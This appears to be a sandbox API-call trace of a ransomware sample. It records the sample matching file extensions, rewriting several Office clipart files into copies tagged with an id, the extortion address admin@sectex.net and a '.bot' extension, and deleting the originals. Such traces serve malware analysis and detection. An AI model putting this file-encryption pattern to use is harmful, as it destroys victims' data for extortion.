	[0161.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.602] lstrlenW (lpString=".rar") returned 4
	[0161.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString=".bz2") returned 4
	[0161.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString=".7z") returned 3
	[0161.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.602] lstrlenW (lpString=".dbf") returned 4
	[0161.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.602] lstrlenW (lpString=".1cd") returned 4
	[0161.602] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.602] lstrlenW (lpString=".jpg") returned 4
	[0161.602] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.602] lstrlenW (lpString=".doc") returned 4
	[0161.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString=".docx") returned 5
	[0161.602] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.602] lstrlenW (lpString=".pdf") returned 4
	[0161.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.602] lstrlenW (lpString=".xls") returned 4
	[0161.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.602] lstrlenW (lpString=".xlsx") returned 5
	[0161.603] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.603] lstrlenW (lpString=".ppt") returned 4
	[0161.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.603] lstrlenW (lpString=".zip") returned 4
	[0161.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.603] lstrlenW (lpString=".rar") returned 4
	[0161.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.603] lstrlenW (lpString=".bz2") returned 4
	[0161.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.603] lstrlenW (lpString=".7z") returned 3
	[0161.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.603] lstrlenW (lpString=".dbf") returned 4
	[0161.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.603] lstrlenW (lpString=".1cd") returned 4
	[0161.603] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned 63
	[0161.603] lstrlenW (lpString=".jpg") returned 4
	[0161.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.603] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.603] lstrlenW (lpString="J0107452.WMF") returned 12
	[0161.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.632] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=21216) returned 1
	[0161.632] CloseHandle (hObject=0x1d8) returned 1
	[0161.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf")) returned 0x20
	[0161.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.639] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.639] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.640] GetLastError () returned 0x0
	[0161.640] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x52e0, lpOverlapped=0x0) returned 1
	[0161.642] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x52f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x52f0, lpOverlapped=0x0) returned 1
	[0161.643] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.643] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.643] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.643] CloseHandle (hObject=0x3c4) returned 1
	[0161.644] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.644] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.646] CloseHandle (hObject=0x3f0) returned 1
	[0161.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.646] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf")) returned 1
	[0161.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.647] lstrlenW (lpString=".doc") returned 4
	[0161.647] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.647] lstrlenW (lpString=".docx") returned 5
	[0161.647] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.647] lstrlenW (lpString=".pdf") returned 4
	[0161.647] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.647] lstrlenW (lpString=".xls") returned 4
	[0161.647] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.647] lstrlenW (lpString=".xlsx") returned 5
	[0161.647] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.647] lstrlenW (lpString=".ppt") returned 4
	[0161.647] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.647] lstrlenW (lpString=".zip") returned 4
	[0161.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.647] lstrlenW (lpString=".rar") returned 4
	[0161.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.647] lstrlenW (lpString=".bz2") returned 4
	[0161.647] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.647] lstrlenW (lpString=".7z") returned 3
	[0161.647] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.647] lstrlenW (lpString=".dbf") returned 4
	[0161.647] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.648] lstrlenW (lpString=".1cd") returned 4
	[0161.648] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.648] lstrlenW (lpString=".jpg") returned 4
	[0161.648] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.648] lstrlenW (lpString=".doc") returned 4
	[0161.648] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.648] lstrlenW (lpString=".docx") returned 5
	[0161.648] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.648] lstrlenW (lpString=".pdf") returned 4
	[0161.648] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.648] lstrlenW (lpString=".xls") returned 4
	[0161.648] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.648] lstrlenW (lpString=".xlsx") returned 5
	[0161.648] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.648] lstrlenW (lpString=".ppt") returned 4
	[0161.648] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.648] lstrlenW (lpString=".zip") returned 4
	[0161.648] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.648] lstrlenW (lpString=".rar") returned 4
	[0161.648] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.648] lstrlenW (lpString=".bz2") returned 4
	[0161.648] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.648] lstrlenW (lpString=".7z") returned 3
	[0161.648] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.648] lstrlenW (lpString=".dbf") returned 4
	[0161.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.649] lstrlenW (lpString=".1cd") returned 4
	[0161.649] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned 63
	[0161.649] lstrlenW (lpString=".jpg") returned 4
	[0161.649] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.649] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.649] lstrlenW (lpString="J0107468.WMF") returned 12
	[0161.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.649] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=9612) returned 1
	[0161.649] CloseHandle (hObject=0x3f0) returned 1
	[0161.650] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf")) returned 0x20
	[0161.650] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.650] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.650] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.651] GetLastError () returned 0x0
	[0161.651] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x258c, lpOverlapped=0x0) returned 1
	[0161.653] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2590, lpOverlapped=0x0) returned 1
	[0161.654] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.654] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.654] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.654] CloseHandle (hObject=0x3c4) returned 1
	[0161.654] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.654] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.656] CloseHandle (hObject=0x3f0) returned 1
	[0161.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.657] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf")) returned 1
	[0161.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.657] lstrlenW (lpString=".doc") returned 4
	[0161.657] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.657] lstrlenW (lpString=".docx") returned 5
	[0161.657] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.657] lstrlenW (lpString=".pdf") returned 4
	[0161.657] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.657] lstrlenW (lpString=".xls") returned 4
	[0161.658] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.658] lstrlenW (lpString=".xlsx") returned 5
	[0161.658] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.658] lstrlenW (lpString=".ppt") returned 4
	[0161.658] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.658] lstrlenW (lpString=".zip") returned 4
	[0161.658] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.658] lstrlenW (lpString=".rar") returned 4
	[0161.658] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.658] lstrlenW (lpString=".bz2") returned 4
	[0161.658] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.658] lstrlenW (lpString=".7z") returned 3
	[0161.658] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.658] lstrlenW (lpString=".dbf") returned 4
	[0161.658] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.658] lstrlenW (lpString=".1cd") returned 4
	[0161.658] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.658] lstrlenW (lpString=".jpg") returned 4
	[0161.658] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.658] lstrlenW (lpString=".doc") returned 4
	[0161.658] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.658] lstrlenW (lpString=".docx") returned 5
	[0161.658] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.658] lstrlenW (lpString=".pdf") returned 4
	[0161.659] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.659] lstrlenW (lpString=".xls") returned 4
	[0161.659] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.659] lstrlenW (lpString=".xlsx") returned 5
	[0161.659] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.659] lstrlenW (lpString=".ppt") returned 4
	[0161.659] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.659] lstrlenW (lpString=".zip") returned 4
	[0161.659] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.659] lstrlenW (lpString=".rar") returned 4
	[0161.659] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.659] lstrlenW (lpString=".bz2") returned 4
	[0161.659] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.659] lstrlenW (lpString=".7z") returned 3
	[0161.659] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.659] lstrlenW (lpString=".dbf") returned 4
	[0161.659] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.659] lstrlenW (lpString=".1cd") returned 4
	[0161.659] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF") returned 63
	[0161.659] lstrlenW (lpString=".jpg") returned 4
	[0161.659] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.659] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.659] lstrlenW (lpString="J0107480.WMF") returned 12
	[0161.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.661] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6024) returned 1
	[0161.661] CloseHandle (hObject=0x3f0) returned 1
	[0161.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf")) returned 0x20
	[0161.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.661] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.661] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.662] GetLastError () returned 0x0
	[0161.662] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1788, lpOverlapped=0x0) returned 1
	[0162.203] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1790, lpOverlapped=0x0) returned 1
	[0162.247] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.247] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.247] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.247] CloseHandle (hObject=0x3c4) returned 1
	[0162.247] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.247] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.249] CloseHandle (hObject=0x3f0) returned 1
	[0162.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.250] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf")) returned 1
	[0162.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.250] lstrlenW (lpString=".doc") returned 4
	[0162.250] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.250] lstrlenW (lpString=".docx") returned 5
	[0162.250] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.250] lstrlenW (lpString=".pdf") returned 4
	[0162.250] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.250] lstrlenW (lpString=".xls") returned 4
	[0162.250] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.250] lstrlenW (lpString=".xlsx") returned 5
	[0162.250] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.251] lstrlenW (lpString=".ppt") returned 4
	[0162.251] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.251] lstrlenW (lpString=".zip") returned 4
	[0162.251] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.251] lstrlenW (lpString=".rar") returned 4
	[0162.251] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString=".bz2") returned 4
	[0162.251] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString=".7z") returned 3
